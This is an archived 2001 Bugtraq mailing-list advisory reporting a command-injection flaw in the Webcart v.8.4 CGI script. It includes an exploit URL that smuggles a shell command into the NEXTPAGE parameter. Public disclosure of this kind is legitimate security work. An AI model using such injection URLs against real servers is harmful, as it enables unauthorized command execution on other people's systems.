[22918] in bugtraq
Webcart v.8.4
daemon@ATHENA.MIT.EDU (root@xpteam.f2s.com)
Fri Oct 19 18:05:25 2001
Message-ID: <1003462164.3bcf9e149b843@webmail.freedom2surf.net>
Date: Fri, 19 Oct 2001 03:29:24 +0000
From: root@xpteam.f2s.com
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
Webcart v.8.4 by Mountain Network Systems, Inc.,
This script has vulnerability (does not filter input of the
user) which allows to carry out commands from
WebServer.
EXPLOIT:
http://www.server.com/cgi-bin/webcart/webcart.cgi?
CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
-------------------------------------------------
Everyone should have http://www.freedom2surf.net/
